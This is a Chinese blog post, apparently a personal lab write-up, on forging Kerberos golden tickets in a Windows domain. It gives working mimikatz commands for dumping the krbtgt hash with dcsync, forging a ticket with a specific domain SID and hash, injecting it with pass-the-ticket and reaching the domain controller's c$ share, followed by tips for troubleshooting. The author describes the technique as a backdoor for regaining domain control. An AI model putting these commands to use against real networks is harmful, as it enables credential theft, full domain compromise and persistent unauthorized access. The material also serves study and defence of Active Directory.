• 域渗透之金票据学习.md


    域渗透之金票据学习

    金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。
    krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。

    0x01金票据利用条件

    域控中krbtgt账户NTLM密码哈希

    域中的sid值

    一台域中主机

    与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。

    0x02实战

    环境
    域控2k3,ip:10.0.2.15
    域内主机07,ip:10.0.2.16

    1)在域控中导出krbtgt的ntlm hash lsadump::dcsync /domain:jiu.com /user:krbtgt"

    在这里插入图片描述

    2)获取域的sid,在域成员机中whoami /user

    在这里插入图片描述

    3)使用mimikazt执行 mimikatz "kerberos::golden /user:jiujiu.com /domain:jiu.com /sid: S-1-5-21-2389719689-216894236-2598731090 /krbtgt: 0264754e9f36d010f91dc66bad49149d /ptt" exit

    kerberos :: golden:创建黄金
    user:jiujiu99伪造的用户
    domain:jiu.com域名
    sid:id域中sid
    krbtft:hash在域控中导出的hash
    ppt:将伪造的票据插入到内存中以供使用
    在这里插入图片描述

    4)验证

    在这里插入图片描述

    0x03补充

    其中也可以分步创建票据与导入
    kerberos::purge
    kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi
    kerberos::ptt administrator.kiribi
    kerberos::tgt
    dir [jiu.com](http://jiu.com/)\c$

    0x04踩坑

    1:域成员机不能为03与xp及一下,否则mimikatz导入票据时会出错。(问了别人半天才知道)

    2:最后连接为域控计算机全名,不能为IP地址。

    3:可通过在cmd下mimikatz log "命令"的方式执行,直接运行mimikatz可能会造成无法复制的尴尬情况

    4:域中sid当创建票据时,不要最后一个横线及以后的内容

    0x05学习借鉴

    https://www.cnblogs.com/backlion/p/8127868.html
    https://www.secpulse.com/archives/40497.html
    https://www.freebuf.com/sectool/112594.html
    
  • 相关阅读:
    day15 web框架和Django基础
    activiti5.22 获得mybatis sessionFactory
    activiti 视图
    activiti 任意退
    spring cloud &&spring boot
    JPA 一对多关联
    webstorm 快捷键
    web storm 破解
    Excel通用导出
    activiti 小计
  • 原文地址:https://www.cnblogs.com/nsfoxer/p/16317369.html
Copyright © 2020-2023  润新知